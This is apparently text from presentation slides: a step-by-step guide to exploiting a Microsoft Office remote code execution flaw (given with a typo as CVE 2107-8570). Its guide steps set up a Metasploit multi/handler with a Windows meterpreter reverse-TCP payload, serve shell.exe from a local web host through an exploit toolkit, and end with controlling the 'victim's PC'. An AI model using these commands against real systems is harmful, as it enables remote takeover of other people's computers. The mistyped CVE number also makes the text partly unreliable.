• CVE- Common Vulnerbilities and Exposures (CVE 2107-8570)
• CVE-2107-8570- is a remote code execution vulnerability exists in
Microsoft Office software when it fails to properly handle objects
in memory. An attacker who successfully exploited the
vulnerability could use a specially crafted file to perform actions
in the security context of the current user. For example, the file
could then take actions on behalf of the logged-on users with the
same permissions as the current user. Exploitation on this
vulnerability requires that a user open a specially crafted file with
an affected version of Microsoft Office Software.
Guide cont’d: Start Metasploit server
• Notice: This is an important thing!!!! This service should be
running, because without it metasploit framework is not going to
be connected to server.
• service postgresql start
Guide cont’d: Starting the mfconsole
• # msfconsole -x "use multi/handler; set PAYLOAD
windows/x64/meterpreter/reverse_tcp; set LHOST 10.0.2.15;
• (In /tmp directory)
Guide cont’d: Start toolkit in exploit mode to
deliver local payload
• Will be started on port 80.
#python2.7 cve-2017-8570_toolkit.py -M exp -e
http://10.0.2.15/shell.exe -l /tmp/shell.exe
• (In /tmp/CVE directory)
The connection is established.
• Now you can use any command in meterpreter to use victim’s PC.
• In the most recent Microsoft Office Security Update; Microsoft
have released a patch to prevent this exploit.
• One more thing; I have tried transferring this presentation through
Gmail, it did not work; in my opinion, Gmail is removing the
executable code from the presentation. Moreover, it is showing
that similar files were used to steal personal information.